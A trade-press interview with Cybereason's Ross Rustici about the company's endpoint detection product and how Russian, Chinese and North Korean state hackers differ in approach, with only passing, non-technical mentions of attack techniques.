Cybereason’s Senior Director of Intelligence Ross Rustici on differing national cyber cultures, North Korean infosec capabilities and the failure rate of perimeter protection
As cybersecurity startups go, Cybereason is a little different. The Boston-headquartered machine learning specialist was founded in Tel Aviv by a team of 8200 unit veterans (the Israel Defense Forces’ offensive hacking unit).
With clients including Japan’s Softbank (now also an investor) and Lockheed Martin, it aims to apply a combination of military-acquired skills and cloud-powered machine learning to endpoint detection and response.
Cybereason’s Senior Director, Intelligence Services, Ross Rustici has a background at the US Department of Defense.
He joined Computer Business Review for a chat in London to discuss Cybereason’s toolkit and the increasingly blurred lines between nation states, cybercriminals and hacktivists.
Tell Me About Cybereason…
Our founders are ex-Israeli intelligence who worked on the offensive side. They basically wanted to build a tool that would catch themselves. We follow the kill chain model started by Lockheed Martin and try to interrupt every stage once an intruder’s inside a target network. So whether its endpoint visibility to the initial injection point, lateral movement or exfiltration; at all of those stages we have built detections that detect anomalies early, so you can see the full exploitation path and intervene fast.
How Big’s the Company?
We’ve doubled in size over the past 12 months to around 350 people. We’ve gone from startup mode to growth mode and are hoping to double revenue this year. Softbank, which was initially a customer, is our biggest investor. Charles River Ventures and Lockheed also have $25 million in the company.
What we do wouldn’t have been possible ten years ago without the computational power the cloud gives. [Cybereason is on AWS]. We have around 300 customers at the moment, some small, some with hundreds of thousands of endpoints, and our real-time graph is doing around eight million events per second in terms of processing what’s going on at a particular endpoint…
Many of you have an Intel or Military Background. How Much is the Increased Visibility of the Nation State in the Cyber Realm having a Security Impact?
It’s one of the largest complicating factors for the industry at large – we’re really the only industry that is going toe-to-toe with militaries on a regular basis. The landscape has changed a lot since the early 2000s, which was the Wild West with a lot of experimentation. Every country has taken a very different approach to it.
In What Sense?
You’ve got the old ‘spy game’ between Russia and the West that has its own form of gentleman’s honour. It’s very focussed on crown jewels and not getting caught. China has a very different approach that is influenced by the PLA’s history and then you have the North Koreas and Irans of this world who see cybersecurity as an equaliser; it allows them to reach out and touch people in a way they never could before.
How Legitimate a Cyber Threat is North Korea? It’s a Highly Isolated State After All with Poor Connectivity.
If they were operating from North Korea, that would be a fair point. They’re not. They are using much better Chinese and Southeast Asian fibre. They operate from at least half a dozen locations in places it is difficult to retaliate against. Technically, they are far better than most people give them credit for.
People have overlooked them as they’ve been focussed on East Asia, but you can trace their lineage and evolution through Chinese and South Korean reporting streams.
They’ve got on the classified networks of the South Korean military which they probably have access to secret level info on the US Military. They’ve got into nuclear power plants. They’ve got into a lot of industrial control systems. They have the technical sophistication to do what they want. We generally don’t see their very top tier tools because they simply don’t need them but they stockpile 0days and they use them.
You Mentioned that China has a very Different Approach to Russia when it comes to Hacking…
The Five Eyes community and Russia are prolific and very good, but they have typically gone after industries that are “acceptable”; defense contractors, government agencies, some of the international organisations.
There is a lot of nefarious activity that goes on but’s generally confined to those traditional nation state playground. China was very much outside that playground and they have a very different philosophy on intelligence collection.
Outside the Playground in What Sense?
They understand that the aggregate picture can inform just as well as crown jewel intrusions, so while it be really great to get the executive order that says explicitly what the US plans to do against china, they can assemble an 80-90 percent picture by putting all the open source materials together.
That’s partly cultural for the Chinese intelligence services; partially based off the fact that for a long time they didn’t have access to the information that the Russians and others have. They don’t have as global a presence; they don’t have as many legacy collection points as the old global players do.
The information revolution allowed them to leapfrog that legacy collection systems but is also being applied in the structure they’re operating under… so you saw the Chinese go very broad, and basically take on everyone. This is changing fast now, but it is based in part on a legacy People’s War mindset of ‘we have more people and munitions than any country, we can take more casualties than anybody else; just go conquer territory and if we lose territory, we can regain it, we have the resources…”
How Extensive is the Bleed Between the Nation State and Commercial Realm in terms of Cybersecurity?
There’s been a lot of bleed between nation states and cybercriminal communities. Some is intentional, some is accidental. On the offensive side, this is an ease of operations thing. Using freelancers gives plausible deniability; in China, the military is poorly paid and it’s easier to get tech talent freelance. In Russia, there’s the Old Boy’s network of former intel and organised crime who like to keep half a hand on the tiller.
On the Western side, you have lots of exposed toolkits that have brought nation state level capabilities to generic pen testing tools. This has increased the floor for hacking and resulted in a thick band of activity that sees cybercrime, cyberhacktivist and nation state actors playing at a similar level of sophistication in many instances, because the tools are good enough to do what they want and don’t need to be over-engineered.
What About the Defensive Side?
In defensive side… we’re seeing a greater transfer of knowledge as a lot of people leave government with an inherent knowledge of adversaries and how they’re tracked, and bringing those techniques to the private sector. You’ve also got a lot of government initiatives to try to spread that knowledge because of a desire forcollective security: if we can bring everyone’s defenses up to a certain level, it gets a lot harder to operate. Ultimately though we’re not seeing as great a transfer of knowledge on the defensive side as we’re seeing on the offensive side… defense requires a lot of visibility and a lot of ability to play the adversary, and it’s less of a technical challenge.
What Do You Mean by Play the Adversary?
If you’re playing against the Chinese, it’s a different playbook to playing against the Russians. You can annoy and kick out a Chinese hacker in a different way. That’s a key part of threat modelling – playing the adversary as well as the tools. Most cybersecurity companies are very tool-focussed, and that’s also why cybersecurity has a 100 percent failure rate. Even the best companies all talk about not if, but when you’re breached.
If you’re main tool is meant to stop breaches, why is your PR talking about your ability to do remediation? The attacker always has more time. And if your security product is good enough, they’ll devote specific resources to reverse-engineering it to avoid it or even use it to hack a network.
So How Does What you Do Differ?
From a tech perspective we’re about techniques rather than tools. Take lateral movement; there are only really five to ten main techniques for lateral movement… they’re all implemented differently but the core behaviour’s the same.
The core tech we do is a very lightweight probe on actual end-points. It is basically real-time grab of everything that’s happening on a laptop. You use machine learning to look for abnormalities on the edge case of that pattern. If your email attachment is spawning a Excel document that is jumping into a process never used on your laptop before, you’ve got an intrusion vector and lateral movement and an adversary that’s going after things. It takes raw processing power on a scale that wouldn’t have been possible until recently, but which can now be both incredibly powerful and subtle.
Give me an Example of Such Lateral Movements…
It might be pass the hash techniques, abnormal mounts of network drives, Powershell… have you got someone lazily using Base 64 coding in a Powershell script? Very few people are going to use that legitimately! Lots of adversaries have automated scripts that look very similar to what’s being used in a given environment but which suddenly forks info to a place it’s never been before…
Say I’m a Potential Client, How does this Work? A Licensing Agreement?
You pay per user; licensing per endpoint. It’s a weekend roll-out and the probe itself is incredibly lightweight. the endpoint detection response is on user space. If you want protection modules, that’s in the kernel space, but we have a very good track record of not causing system issues. As mentioned, the data is processed back in the cloud without a hit to the local CPU.
Per user, licensing per endpoint. Easy roll-out. Probe itself is incredibly lightweight. The EDR product endpoint detection response, its on user space. If you want our next gen EV and some of the protection modules, that’s in the kernel space because you can’t walk without it… so you have that choice of really do no harm… or the prevention space in the kernel. But we have a very good track record of not causing system issues. It’s v lightweight. Data is processed back in the cloud… lot of modelling and patterning without having a user hit to the local CPU. It’s a very scalable architecture. Most of our leadership comes from the public sector so there’s an intrinsic do-good element to the company.